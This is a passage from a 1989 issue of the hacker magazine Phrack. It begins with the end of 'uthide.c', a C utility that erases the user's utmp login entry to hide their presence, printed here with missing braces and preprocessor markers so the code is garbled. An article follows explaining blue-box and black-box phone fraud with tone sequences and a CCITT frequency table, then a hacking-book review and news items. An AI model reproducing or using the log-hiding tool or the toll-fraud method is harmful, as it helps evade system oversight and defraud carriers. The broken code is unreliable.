  2125. X       return((path && (p = strrchr(path, '/'))) ? p+1 : path);
  2126. X
  2127. X
  2128. Xmain()
  2129. X
  2130. X      struct  utmp    ut;
  2131. X       int             fd;
  2132. X       char            *strrchr();
  2133. X       char            *ttyname(), *tty = basename(ttyname(0));
  2134. X
  2135. X       if (!tty)
  2136. X               puts("not on a tty");
  2137. X               exit(1);
  2138. X
  2139. X
  2140. X       if ((fd = open(UTMP, O_RDWR)) < 0)
  2141. X               perror(UTMP);
  2142. X               exit(2);
  2143. X
  2144. X
  2145. X       while (read(fd, &ut, sizeof(ut)) == sizeof(ut))
  2146. X               if (!strncmp(ut.ut_line, tty, sizeof(ut.ut_line)))
  2147. X                       bzero(ut.ut_name, sizeof(ut.ut_name));
  2148. Xifndef BSD
  2149. X                       ut.ut_type = INIT_PROCESS;
  2150. X                       ut.ut_pid = 1;
  2151. Xelse
  2152. X                       bzero(ut.ut_host, sizeof(ut.ut_host));
  2153. Xendif BSD
  2154. X                       if (lseek(fd, -sizeof(ut), 1) < 0)
  2155. X                               puts("seek error");
  2156. X                               exit(3);
  2157. X
  2158. X                       if (write(fd, &ut, sizeof(ut)) != sizeof(ut))
  2159. X                               puts("write error");
  2160. X                               exit(4);
  2161. X
  2162. X                       exit(0);
  2163. X
  2164. X
  2165. X
  2166. X       puts("you don't exist");
  2167. X       exit(5);
  2168. X
  2169.  
  2170. END_OF_FILE
  2171. if test 1296 -ne `wc -c <'uthide.c'`; then
  2172.     echo shar: \"'uthide.c'\" unpacked with wrong size!
  2173. fi
  2174.  end of 'uthide.c'
  2175. fi
  2176. echo shar: End of shell archive.
  2177. exit 0
  2178. _______________________________________________________________________________
  2179.  
  2180.                                 ==Phrack Inc.==
  2181.  
  2182.                      Volume Three, Issue 25, File 7 of 11
  2183.  
  2184.       ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^
  2185.       ^*^                                                             ^*^
  2186.       ^*^                  The Blue Box And Ma Bell                   ^*^
  2187.       ^*^                                                             ^*^
  2188.       ^*^                 Brought To You by The Noid                  ^*^
  2189.       ^*^                                                             ^*^
  2190.       ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^
  2191.  
  2192.  
  2193.         "...The user placed the speaker over the telephone handset's
  2194.          transmitter and simply pressed the buttons that corresponded
  2195.          to the desired CCITT tones.  It was just that simple."
  2196.  
  2197.  
  2198.                           THE BLUE BOX AND MA BELL
  2199.                           ~~~~~~~~~~~~~~~~~~~~~~~~
  2200.  
  2201. Before the breakup of AT&T, Ma Bell was everyone's favorite enemy.  So it was
  2202. not surprising that so many people worked so hard and so successfully at
  2203. perfecting various means of making free and untraceable telephone calls.
  2204. Whether it was a BLACK BOX used by Joe and Jane College to call home, or a BLUE
  2205. BOX used by organized crime to lay off untraceable bets, the technology that
  2206. provided the finest telephone system in the world contained the seeds of its
  2207. own destruction.
  2208.  
  2209. The fact of the matter is that the Blue Box was so effective at making
  2210. untraceable calls that there is no estimate as to how many calls were made
  2211. or lost revenues of $100, $100-million, or $1-billion on the Blue Box.  Blue
  2212. Boxes were so effective at making free, untraceable calls that Ma Bell didn't
  2213. want anyone to know about them, and for many years denied their existence. They
  2214. even went as far as strongarming a major consumer-science magazine into killing
  2215. an article that had already been prepared on the Blue and Black boxes.
  2216. Furthermore, the police records of a major city contain a report concerning a
  2217. break-in at the residence of the author of that article.  The only item missing
  2218. following the break-in was the folder containing copies of one of the earliest
  2219. Blue-Box designs and a Bell-System booklet that described how subscriber
  2220. billing was done by the AMA machine -- a booklet that Ma Bell denied ever
  2221. existed.  Since the AMA (Automatic Message Accounting) machine was the means
  2222. whereby Ma Bell eventually tracked down both the Blue and Black Boxes, I'll
  2223. take time out to explain it.  Besides, knowing how the AMA machine works will
  2224. help you to better understand Blue and Black Box "phone phreaking."
  2225.  
  2226.  
  2227. Who Made The Call?
  2228. ~~~~~~~~~~~~~~~~~~
  2229. Back in the early days of the telephone, a customer's billing originated in a
  2230. mechanical counting device, which was usually called a "register" or a "meter."
  2231. Each subscriber's line was connected to a meter that was part of a wall of
  2232. meters.  The meter clicked off the message units, and once a month someone
  2233. simply wrote down the meter's reading, which was later interpolated into
  2234. message-unit billing for those subscriber's who were charged by the message
  2235. unit.  (Flat-rate subscriber's could make unlimited calls only within a
  2236. designated geographic area.  The meter clicked off message units for calls
  2237. outside that area.)  Because eventually there were too many meters to read
  2238. individually, and because more subscribers started questioning their monthly
  2239. bills, the local telephone companies turned to photography.  A photograph of a
  2240. large number of meters served as an incontestable record of their reading at a
  2241. given date and time, and was much easier to convert to customer billing by the
  2242. accounting department.
  2243.  
  2244. As you might imagine, even with photographs, billing was cumbersome and did not
  2245. reflect the latest technical developments.  A meter didn't provide any
  2246. indication of what the subscriber was doing with the telephone, nor did it
  2247. indicate how the average subscriber made calls or the efficiency of the
  2248. information service (how fast the operators could handle requests).  So the
  2249. meters were replaced by the AMA machine.  One machine handled up to 20,000
  2250. subscribers.  It produced a punched tape for a 24-hour period that showed,
  2251. among other things, the time a phone was picked up (went off-hook), the number
  2252. dialed, the time the called party answered, and the time the originating phone
  2253. was hung up (placed on-hook).
  2254.  
  2255. One other point, which will answer some questions that you're certain to think
  2256. of as we discuss the Black & Blue boxes:  Ma Bell did not want persons outside
  2257. their system to know about the AMA machine.  The reason:  Almost everyone
  2258. had complaints -- usually unjustified -- about their billing.  Had the public
  2259. been aware of the AMA machine they would have asked for a monthly list of their
  2260. telephone calls.  It wasn't that Ma Bell feared errors in billing; rather,
  2261. they were fearful of being buried under any avalanche of paperwork and customer
  2262. complaints.  Also, the public believed their telephone calls were personal and
  2263. untraceable, and Ma Bell didn't want to admit that they knew about the who,
  2264. when, and where of every call.  And so Ma Bell always insisted that billing was
  2265. based on a meter that simply "clicked" for each message unit; that there was no
  2266. record, other than for long-distance as to who called whom.  Long distance was
  2267. handled by, and the billing information was done by an operator, so there was a
  2268. written record Ma Bell could not deny.
  2269.  
  2270. The secrecy surrounding the AMA machine was so pervasive that local, state, and
  2271. even federal police were told that local calls made by criminals were
  2272. untraceable, and that people who made obscene telephone calls could not be
  2273. tracked down unless the person receiving the call could keep the caller on the
  2274. line for some 30 to 50 minutes so the connections could be physically traced by
  2275. technicians.  Imagine asking a woman or child to put up with almost an hour's
  2276. worth of the most horrendous obscenities in the hope someone could trace the
  2277. line.  Yet in areas where the AMA machine had replaced the meters, it would
  2278. have been a simple, though perhaps time-consuming task, to track down the
  2279. numbers called by any telephone during a 24 hour period.  But Ma Bell wanted
  2280. the AMA machine kept as secret as possible, and so many a criminal was not
  2281. caught, and many a woman was harassed by the obscene calls of a potential
  2282. rapist, because existence of the AMA machine was denied.
  2283.  
  2284. As a sidelight as to the secrecy surrounding the AMA machine, someone at Ma
  2285. Bell or the local operating company decided to put the squeeze on the author of
  2286. the article on Blue Boxes, and reported to the Treasury Department that he was,
  2287. in fact, manufacturing them for organized crime -- the going rate in the mid
  2288. 1960's was supposedly $20,000 a box.  (Perhaps Ma Bell figured the author would
  2289. get the obvious message:  Forget about the Blue Box and the AMA machine or
  2290. you'll spend lots of time, and much money on lawyer's fees to get out of the
  2291. hassles it will cause.)  The author was suddenly visited at his place of
  2292. employment by a Treasury agent.
  2293.  
  2294. Fortunately, it took just a few minutes to convince the agent that the author
  2295. was really just that, and not a technical wizard working for the mob.  But one
  2296. conversation led to another, and the Treasury agent was astounded to learn
  2297. about the AMA machine.  (Wow! Can an author whose story is squelched spill his
  2298. guts.)  According to the Treasury agent, his department had been told that it
  2299. was impossible to get a record of local calls made by gangsters:  The Treasury
  2300. department had never been informed of the existence of automatic message
  2301. accounting.  Needless to say, the agent left with his own copy of the Bell
  2302. System publication about the AMA machine, and the author had an appointment
  2303. with the local Treasury-Bureau director to fill him in on the AMA machine.
  2304. That information eventually ended up with Senator Dodd, who was conducting a
  2305. congressional investigation into, among other things, telephone company
  2306. surveillance of subscriber lines -- which was a common practice for which there
  2307. was detailed instructions, Ma Bell's own switching equipment ("crossbar")
  2308. manual.
  2309.  
  2310. The Blue Box
  2311. ~~~~~~~~~~~~
  2312. The Blue Box permitted free telephone calls because it used Ma Bell's own
  2313. internal frequency-sensitive circuits.  When direct long-distance dialing was
  2314. introduced, the crossbar equipment knew a long-distance call was being dialed
  2315. by the three-digit area code.  The crossbar then converted the dial pulses to
  2316. the CCITT tone groups, shown in the attached table (at the end of this file),
  2317. that are used for international and trunkline signaling.  (Note that those do
  2318. not correspond to Touch-Tone frequencies.)  As you will see in that table, the
  2319. tone groups represent more than just numbers; among other things there are tone
  2320. groups identified as 2600 hertz, KP (prime), and ST (start) -- keep them in
  2321. mind.
  2322.  
  2323. When a subscriber dialed an area code and a telephone number on a rotary-dial
  2324. telephone, the crossbar automatically connected the subscriber's telephone to a
  2325. long-distance trunk, converted the dial pulses to CCITT tones, set up
  2326. electronic cross-country signaling equipment, and recorded the originating
  2327. number and the called number on the AMA machine.  The CCITT tones sent out on
  2328. the long-distance trunk lines activated special equipment that set up or
  2329. selected the routing and caused electro-mechanical equipment in the target city
  2330. to dial the called telephone.
  2331.  
  2332. Operator-assisted long-distance calls worked the same way.  The operator simply
  2333. logged into a long-distance trunk and pushed the appropriate buttons, which
  2334. generated the same tones as direct-dial equipment.  The button sequence was
  2335. 2600 hertz, KP (which activated the long-distance equipment), then the complete
  2336. area code and telephone number.  At the target city, the connection was made to
  2337. the called number but ringing did not occur until the operator there pressed
  2338. the ST button.
  2339.  
  2340. The sequence of events of early Blue Boxes went like this:  The caller dialed
  2341. information in a distant city, which caused his AMA machine to record a free
  2342. call to information.  When the information operator answered, he pressed the
  2343. 2600 hertz key on the Blue Box, which disconnected the operator and gave him
  2344. access to a long-distance trunk.  He then dialed KP and the desired number and
  2345. ended with an ST, which caused the target phone to ring.  For as long as the
  2346. conversation took place, the AMA machine indicated a free call to an
  2347. information operator.  The technique required a long-distance information
  2348. operator because the local operator, not being on a long distance trunk, was
  2349. accessed through local wire switching, not the CCITT tones.
  2350.  
  2351. Call Anywhere
  2352. ~~~~~~~~~~~~~
  2353. Now imagine the possibilities.  Assume the Blue Box user was in Philadelphia.
  2354. He would call Chicago information, disconnect from the operator with a KP tone,
  2355. and then dial anywhere that was on direct-dial service:  Los Angeles, Dallas,
  2356. or anywhere in the world if the Blue Boxer could get the international codes.
  2357.  
  2358. The legend is often told of one Blue Boxer who, in the 1960's, lived in New
  2359. York and had a girl friend at a college near Boston. Now back in the 1960's,
  2360. making a telephone call to a college town on the weekend was even more
  2361. difficult than it is today to make a call from New York to Florida on a
  2362. reduced-rate holiday using one of the cut-rate long-distance carriers.  So our
  2363. Blue Boxer got on an international operator's circuit to Rome, Blue Boxed
  2364. through to a Hamburg operator, and asked Hamburg to patch through to Boston.
  2365. The Hamburg operator thought the call originated in Rome and inquired as to the
  2366. "operator's" good English, to which the Blue Boxer replied that he was an
  2367. expatriate hired to handle calls by American tourists back to their homeland.
  2368. Every weekend, while the Northeast was strangled by reduced-rate long-distance
  2369. calls, our Blue Boxer had no trouble sending his voice almost 7,000 miles for
  2370. free.
  2371.  
  2372. ...The user placed the speaker over the telephone handset's transmitter and
  2373. simply pressed the buttons that corresponded to the desired CCITT tones.  It
  2374. was just that simple.
  2375.  
  2376. Actually, it was even easier than it reads because Blue Boxers discovered they
  2377. did not need the operator.  If they dialed an active telephone located in
  2378. certain nearby, but different, area codes, they could Blue Box just as if they
  2379. had Blue Boxed through an information operator's circuit.  The subscriber whose
  2380. line was Blue Boxed simply found his phone was dead when it was picked up.  But
  2381. if the Blue Box conversation was short, the "dead" phone suddenly came to life
  2382. the next time it was picked up.  Using a list of "distant" numbers, a Blue
  2383. Boxer would never hassle anyone enough times to make them complain to the
  2384. telephone company.
  2385.  
  2386. The difference between Blue Boxing off of a subscriber rather than an
  2387. information operator was that the AMA tape indicated a real long-distance
  2388. telephone call perhaps costing 15 or 25 cents -- instead of a freebie.  Of
  2389. course that is the reason why when Ma Bell finally decided to go public with
  2390. "assisted" newspaper articles about the Blue Box users they had apprehended, it
  2391. was usually about some college kid or "phone phreak."  One never read of a
  2392. mobster being caught.  Greed and stupidity were the reasons why the kid's were
  2393. caught.
  2394.  
  2395. It was the transistor that led to Ma Bell going public with the Blue Box.  By
  2396. using transistors and RC phase-shift networks for the oscillators, a portable
  2397. Blue Box could be made inexpensively, and small enough to be used unobtrusively
  2398. from a public telephone.  The college crowd in many technical schools went
  2399. crazy with the portable Blue Box; they could call the folks back home, their
  2400. friends, or get a free network (the Alberta and Carolina connections -- which
  2401. could be a topic for a whole separate file) and never pay a dime to Ma Bell.
  2402.  
  2403. Unlike the mobsters who were willing to pay a small long-distance charge when
  2404. Blue Boxing, the kids wanted it, wanted it all free, and so they used the
  2405. information operator routing, and would often talk "free-of-charge" for hours
  2406. on end.
  2407.  
  2408. Ma Bell finally realized that Blue Boxing was costing them Big Bucks, and
  2409. decided a few articles on the criminal penalties might scare the Blue Boxers
  2410. enough to cease and desist.  But who did Ma Bell catch?  The college kids and
  2411. the greedies.  When Ma Bell decided to catch the Blue Boxers she simply
  2412. examined the AMA tapes for calls to an information operator that were
  2413. excessively long.  No one talked to an operator for 5, 10, 30 minutes, or
  2414. several hours.  Once a long call to an operator appeared several times on an
  2415. AMA tape, Ma Bell simply monitored the line and the Blue Boxer was caught.
  2416. (Now you should understand why I opened with an explanation of the AMA
  2417. machine.)  If the Blue Boxer worked from a telephone booth, Ma Bell simply
  2418. monitored the booth.  Ma Bell might not have known who originated the call, but
  2419. she did know who got the call and getting that party to spill their guts was no
  2420. problem.
  2421.  
  2422. The mob and a few Blue Box hobbyists (maybe even thousands) knew of the AMA
  2423. machine, and so they used a real telephone number for the KP skip.  Their AMA
  2424. tapes looked perfectly legitimate.  Even if Ma Bell had told the authorities
  2425. they could provide a list of direct-dialed calls made by local mobsters, the
  2426. AMA tapes would never show who was called through a Blue Box.  For example, if
  2427. a bookmaker in New York wanted to lay off some action in Chicago, he could make
  2428. a legitimate call to a phone in New Jersey and then Blue Box to Chicago.  His
  2429. AMA tape would show a call to New Jersey.  Nowhere would there be a record of
  2430. the call to Chicago.  Of course, automatic tone monitoring, computerized
  2431. billing, and ESS (Electronic Switching System) now makes that virtually
  2432. impossible, but that's the way it was.
  2433.  
  2434. You might wonder how Ma Bell discovered the tricks of Blue Boxers.  Simple,
  2435. they hired the perpetrators as consultants.  While the initial newspaper
  2436. articles detailed a potential jail penalties for apprehended blue boxers,
  2437. except for Ma Bell employees who assisted a blue boxer, it is almost impossible
  2438. to find an article on the resolution of the cases because most hobbyist blue
  2439. boxers got suspended sentences and/or probation if they assisted Ma Bell in
  2440. developing anti-blue box techniques.  It is asserted, although it can't be
  2441. easily proven, that cooperating ex-blue boxers were paid as consultants.  (If
  2442. you can't beat them, hire them to work for you.)
  2443.  
  2444. Should you get any ideas about Blue Boxing, keep in mind that modern switching
  2445. equipment has the capacity to recognize unauthorized tones.  It's the reason
  2446. why a local office can leave their subscriber Touch-Tone circuits active,
  2447. almost inviting you to use the Touch-Tone service.  A few days after you use an
  2448. unauthorized Touch-Tone service, the business office will call and inquire
  2449. whether you'd like to pay for the service or have it disconnected.  The very
  2450. same central-office equipment that knows you're using Touch-Tone frequencies
  2451. knows if your line is originating CCITT signals
  2452.  
  2453. The Black Box
  2454. ~~~~~~~~~~~~~
  2455. The Black Box was primarily used by the college crowd to avoid charges when
  2456. frequent calls were made between two particular locations, say the college and
  2457. a student's home.  Unlike the somewhat complex circuitry of a Blue Box, a Black
  2458. Box was nothing more than a capacitor, a momentary switch, and a battery.
  2459.  
  2460. As you recall from our discussion of the Blue Box, a telephone circuit is
  2461. really established before the target phone ever rings, and the circuit is
  2462. capable of carrying an AC signal in either direction.  When the caller hears
  2463. the ringing in his or her handset, nothing is happening at the receiving end
  2464. because the ringing signal he hears is really a tone generator at his local
  2465. telephone office.  The target (called) telephone actually gets its 20
  2466. pulses-per-second ringing voltage when the person who dialed hears nothing in
  2467. the "dead" spaces between hearing the ringing tone.  When the called phone is
  2468. answered and taken off hook, the telephone completes a local-office DC loop
  2469. that is the signal to stop the ringing voltage.  About three seconds later the
  2470. DC loop results in a signal being sent all the way back to the caller's AMA
  2471. machine that the called telephone was answered.
  2472.  
  2473. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2474.  
  2475.                             CCITT NUMERICAL CODE
  2476.                             ~~~~~~~~~~~~~~~~~~~~
  2477.     Digit      Frequencies (Hz)
  2478.  
  2479.     1          700+900
  2480.     2          700+1100
  2481.     3          900+1100
  2482.     4          700+1300
  2483.     5          900+1300
  2484.     6          1100+1300
  2485.     7          700+1500
  2486.     8          900+1500
  2487.     9          1100+1500
  2488.     0          1300+1500
  2489.     Code 11    700+1700  for inward
  2490.     Code 12    900+1700  operators
  2491.     KP         1100+1700  Prime (Start of pulsing)
  2492.     KP2        1300+1700  Transit traffic
  2493.     ST         1500+1700  Start (End of pulsing)
  2494. _______________________________________________________________________________
  2495.  
  2496.                                 ==Phrack Inc.==
  2497.  
  2498.                      Volume Three, Issue 25, File 8 of 11
  2499.  
  2500.         /*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\
  2501.         \*/                                                         \*/
  2502.         /*\          Hacking:  What's Legal And What's Not          /*\
  2503.         \*/              Written by Xandor SymmLeo Xet              \*/
  2504.         /*\         With Technical Assistance From The ICH          /*\
  2505.         \*/                                                         \*/
  2506.         /*\     Reviewed by HATCHET MOLLY (TK0GRM1@NIU.BITNET)      /*\
  2507.         \*/               Exclusively for Phrack Inc.               \*/
  2508.         /*\                                                         /*\
  2509.         \*/                      March 8, 1989                      \*/
  2510.         /*\                                                         /*\
  2511.         \*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/*\*/
  2512.  
  2513.  
  2514. "Hacking:  What's Legal And What's Not" was originally published in 1987 by
  2515. "HackTel Communications" of Crosby, Texas.  Reportedly the book is no longer
  2516. being published as the author, Xandor SymmLeo Xet, has joined the United States
  2517. Army.  E. Arthur Brown of Minnesota has bought out the remaining stock and is
  2518. selling it for $12.95 (plus postage and handling) which is about half off it's
  2519. "cover price" of $25.00.
  2520.  
  2521. We've always been taught not to judge a book by its' cover, and I suppose that
  2522. one should not expect beautiful binding and great illustrations in
  2523. self-published books, especially those that deal with hacking and phreaking.
  2524. But I can't help comment on the sheer ugliness of this volume.  To be fair, I
  2525. should preface these remarks by saying that E. Arthur Brown Company does
  2526. give fair warning about the packaging of this book in their advertisement.
  2527.  
  2528. The "book" consist of about 300 photocopied reproductions of non-NLQ dot matrix
  2529. pages.  However, this does not mean you get three hundred pages of information
  2530. as about half of the pages are single sided copies.  All in all I'd say it
  2531. could be reduced to about 200 pages if everything was copied back to back.
  2532. These pages come in a nice three ring binder, black in color, and it even has
  2533. the name of the book silk screened on the cover.  (I can't resist mentioning
  2534. that the title of the book is improperly punctuated on the cover, though it is
  2535. correct inside the manuscript.)
  2536.  
  2537. Presumably the author(s) intended to release follow up reports and addendum to
  2538. the book at later dates (and at additional cost).  So the three-ring binder
  2539. approach makes sense, and the author does explain that he has used single sided
  2540. copies in some places to allow for easy insertation of these "Hacker Reports."
  2541. So perhaps criticisms of the books packaging are a little unfair since it
  2542. appears these concessions were made with a purpose in mind.  This does not,
  2543. however, change what you do indeed get when you order this book.  All potential
  2544. buyers should be aware of what they are getting for their money.
  2545.  
  2546. Enough of what the book looks like, let's examine what it has to offer.
  2547. Generally speaking, it is a cross between a "how to" and a legal reference
  2548. guide.  Much of the book is dedicated to state and federal laws that deal with
  2549. hacking, phreaking, and pirating.  You'll find reprints of the state computer
  2550. crime laws for every state of the union, (current at the time the book was
  2551. written) and the Federal wire fraud and copyright laws.  It does not include
  2552. the Federal Electronic Communication Privacy Act (ECPA) perhaps because act was
  2553. not passed at the time the book was compiled.  The sections on state laws
  2554. appear complete enough, and the full source and appropriate references are
  2555. given if you want to check them for accuracy or changes.  Thoughtfully, the
  2556. author has even included the associated penalties each statute carries.  And
  2557. for those of you who aren't quite up on your Latin, there is even a (very)
  2558. short legal glossary so you can better understand the language of the law.
  2559.  
  2560. The crime laws make up the bulk of the book.  They are probably the most useful
  2561. section despite the fact that the information is at least three years old by
  2562. now.  The rest of the book is dedicated to various topics that are mundane to
  2563. anyone that is an active practitioner of phreaking and/or hacking.  Topics like
  2564. "what is a network" and "how does a war dialer work" really do little for the
  2565. accomplished hacker, and the public can get the same information in the better
  2566. written book by Bill Landreth.
  2567.  
  2568. One point that interested me is that Xet adheres more to the "computer
  2569. professional" definition of "hacker" than he does to the definition used by
  2570. most of the underground.   In other words, he maintains that people who gain
  2571. unauthorized access to systems are "crackers," not "hackers."  He, like many
  2572. phreak/hackers, gets upset when the media uses the term incorrectly, but his
  2573. reasoning is a little different from most.  Interestingly enough, despite an
  2574. entire chapter on software piracy, Xet does not realize that "cracker" already
  2575. refers to a specific type of activity and suggesting it as an alternative to
  2576. "hacker" only serves to further muddy the waters.  To some this may be a minor
  2577. point, but the indiscriminate and apparently uninformed use of terms and labels
  2578. is ill advised in a book that aspires to be a useful reference manual.
  2579.  
  2580. By way of illustration, I've excerpted his definitions (actually, they should
  2581. properly be called "descriptions") of various terms from the glossary:
  2582.  
  2583.      Hacker:  A non-business computer user who operates a computer in
  2584.               conjunction with a modem and who at least knows his (or her) way
  2585.               around a local bulletin board and has at least heard of
  2586.               CompuServe and The Source.  Can usually be found eating pizza or
  2587.               donuts, and has a working knowledge of the effects of long term
  2588.               exposure to great amounts of caffeine either from drinking
  2589.               several softdrinks (sic) or numerous cups of coffee.
  2590.  
  2591.      Cracker:  A hacker who has an adventurous streak which leads him into
  2592.                unknown computer menus and strange protocols of all benign.  He
  2593.                has the ability to crack access codes or passwords in order to
  2594.                illegally enter a computer over the telephone.  Usually a very
  2595.                good problem solver, quick to think, cautious to act.  Often
  2596.                thought of as clever or even sneaky.  Excellent chess players.
  2597.  
  2598.      Chrasher:  A cracker gone bad.  One who gets his jollies from terminating
  2599.                 corporate systems and picking on helpless bulletin boards by
  2600.                 destroying information or files or by rendering a system unable
  2601.                 to communicate (usually referred to as "crashing" the system)
  2602.                 until reset by a sysop.  Very clever, extremely dangerous.
  2603.                 Smart, but hopelessly misdirected.  They deserve respect for
  2604.                 their ability to destroy.
  2605.  
  2606.      Pirate:  Software pirate.  A hacker who concentrates his efforts toward
  2607.               cracking software copyright protection schemes which are placed
  2608.               on computer disks to prevent the illegal copying of factory
  2609.               produced programs.  Some pirates have a habit of collecting
  2610.               software that they have managed to crack either to trade with
  2611.               other pirates for software they don't have yet or just to collect
  2612.               it for the sake of building their egos.  Some of my best friends
  2613.               are pirates.  Usually, very easy going people, and sometimes
  2614.               politically minded as well.  And even more clever than crackers
  2615.               or crashers.
  2616.  
  2617. The problem with these definitions is that they are not mutually exclusive and
  2618. do little but reinforce the stereotypes that hackers, phreakers, and pirates
  2619. already face.  Any phreak/hacker that reads this book will give these
  2620. definitions little attention, if they read them at all, but if this manual is
  2621. used by the media as an "example of hacker literature" it will only further
  2622. perpetuate some of these assumptions.
  2623.  
  2624. A large amount of the book is dedicated to what Xet calls The Gray Pages.
  2625. Labeled as a "national hackers' phone book" it is primarily a list of dialups
  2626. for Telenet, Tymnet, Compuserve, and The Source.  This list is hardly "secret"
  2627. and the format hints that it may just be a capture of the "info" pages from
  2628. each of these networks.  These numbers may be helpful to the beginner, but it
  2629. would have been better if he included instructions on how to dial the toll free
  2630. access number (or call customer service and just ask them) and check for your
  2631. local number by yourself.  Not only would this have cut down on the number of
  2632. pages needed, but it would have at least given the beginner an excuse to
  2633. actually do something themselves.  (Not to mention that is the best way to get
  2634. the most accurate information.)
  2635.  
  2636. The rest of "The Gray Pages" is taken up by a list of 400 public BBS systems.
  2637. Although the list is titled "hacker bulletin boards" many of the systems listed
  2638. are quite legitimate and do not support phreak/hack or pirate activities.  Woe
  2639. to the beginner who calls CLAUG and starts asking for plans to a blue box.  Of
  2640. course the biggest draw back to this list is that it was probably fifty percent
  2641. out of date four months after it was printed.
  2642.  
  2643. Speaking of blue box plans, Xet does offer a short list of box colors and what
  2644. they do.  No plans for boxes are included, nor is there a discussion of DTMF
  2645. tones or other common phreak knowledge.  He does include simple schematics and
  2646. operating instructions for a tap indicator, wire recorder, and a data converter
  2647. (for use with the wire recorder).  The introduction to this section, called
  2648. "gray market equipment" says that future editions of the book will include box
  2649. schematics.
  2650.  
  2651. Finally, there is a short section called "helpful stuff" written by "The ICH."
  2652. This section is pretty informative but offers little clarifying information.
  2653. Basically it includes an ASCII table, DTMF frequencies, satellite and cellular
  2654. frequencies, and a short discussion of packet switching networks.
  2655.  
  2656. In summary, "Hacking:  What's Legal And What's Not" offers some very basic
  2657. information to the beginning hacker, a quite good (although potentially
  2658. outdated) review of relevant state and federal computer crime laws, and a few
  2659. tid-bits here and there that are worth knowing.  But it also wastes a lot of
  2660. space to bulletin boards and dialup numbers that are of little use to anyone.
  2661. Experienced phreak/hackers and pirates will find a few articles that are not
  2662. available elsewhere (like the section on "How Hackers Think" where Xet says
  2663. that since a San Diego BBS poll indicated that 79% of "hackers" had the
  2664. astrological sign of Leo all one has to do to understand hackers is read a
  2665. profile of Leo's!) but the vast majority of the information is old news in a
  2666. new format.
  2667.  
  2668. For someone who wants to get a broad overview of the computer underground I can
  2669. recommend this book.  But if someone is looking for information of any real
  2670. use, I suggest you contact your local phreak/hack BBS and use the G-philes they
  2671. have available.  You won't be missing anything this book has to offer.  E.
  2672. Arthur Brown's price of $12.95 offers a reasonable value, and if your looking
  2673. to develop a "hacker library" you might consider ordering a copy.
  2674. _______________________________________________________________________________
  2675.  
  2676.                                 ==Phrack Inc.==
  2677.  
  2678.                      Volume Three, Issue 25, File 9 of 11
  2679.  
  2680.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2681.             PWN                                                 PWN
  2682.             PWN        P h r a c k   W o r l d   N e w s        PWN
  2683.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  2684.             PWN                Issue XXV/Part 1                 PWN
  2685.             PWN                                                 PWN
  2686.             PWN                 March 29, 1989                  PWN
  2687.             PWN                                                 PWN
  2688.             PWN          Created, Written, and Edited           PWN
  2689.             PWN               by Knight Lightning               PWN
  2690.             PWN                                                 PWN
  2691.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2692.  
  2693.  
  2694. Standing On The Edge Of The Network
  2695. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2696. Greetings once again and welcome to Phrack World News Issue 25, our 25th
  2697. Anniversary Special.
  2698.  
  2699. This issue features articles about the New TAP Magazine, a battle between
  2700. Southwestern Bell and bulletin board operators in Oklahoma City, a whole file's
  2701. worth of information about the KGB hackers, Matthias Speer, Klaus Brunnstein,
  2702. an interview with Pengo, and much more.
  2703.  
  2704. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2705.  
  2706. Suiting Up For SummerCon '89                                     March 22, 1989
  2707. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2708. Once again, for those who may have missed last issue...
  2709.  
  2710.                                  SummerCon '89
  2711.                              Saint Louis, Missouri
  2712.                                June 23-25, 1989
  2713.  
  2714.                                Brought To You By
  2715.                  Forest Ranger / Knight Lightning / Taran King
  2716.  
  2717. The agenda for this year's SummerCon is going to be a sort of mixture of the
  2718. first two.  We do intend to hold an actual conference on Saturday, June 24,
  2719. 1989.  This conference will last as long as necessary and anyone who wishes to
  2720. speak should prepare a presentation ahead of time and notify us as soon as
  2721. possible.
  2722.  
  2723. The location of SummerCon '89 has been decided upon, but reservations are still
  2724. in the progress of being made.  For this reason, we have declined to print the
  2725. name of the hotel for the convention at this time.  Anyone who is seriously
  2726. interested in going to SummerCon '89 and thinks that they will be able to
  2727. attend should contact Taran King or myself as soon as possible.
  2728.  
  2729. :Knight Lightning
  2730. _______________________________________________________________________________
  2731.  
  2732. Mitnick Plea Bargains                                            March 16, 1989
  2733. ~~~~~~~~~~~~~~~~~~~~~
  2734. By Kim Murphy (Los Angeles Times [Excerpts Only])
  2735.  
  2736. Kevin Mitnick pleaded guilty to one count of computer fraud and one count of
  2737. possessing unauthorized long-distance telephone codes.  He admitted penetrating
  2738. a DEC computer in Mass., secretly obtaining a copy of a sophisticated computer
  2739. security program which the company had spent $1 million to develop.
  2740.  
  2741. The program, said Mitnick's attorney, was designed to alert companies when
  2742. their computers had been penetrated by hackers like Mitnick.  Mitnick never
  2743. attempted to sell or distribute the program, he said.  Mitnick also admitted
  2744. possessing 16 unauthorized MCI long-distance codes that enabled him to make
  2745. long-distance telephone calls without charge.  A prosecutor said Mitnick used
  2746. the codes to make connections to computers.
  2747.  
  2748. Mitnick faces one year in prison.  Under a plea agreement with the government,
  2749. he must also submit to three years' supervision by probation officers after his
  2750. release from prison.  Prosecutors said they agreed to a 12-month sentence
  2751. because the amount of financial damage was relatively low.  DEC lost about
  2752. $100,000 to $200,000 in computer "down time" investigating the security program
  2753. theft.
  2754.  
  2755. As part of the plea agreement, prosecutors agreed to dismiss two additional
  2756. counts charging Mitnick with illegally accessing the Leeds University computer
  2757. in England and separate charge related to the DEC computer program.
  2758. _______________________________________________________________________________
  2759.  
  2760. The NEW Technological Advancement Party (TAP)                    March 11, 1989
  2761. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
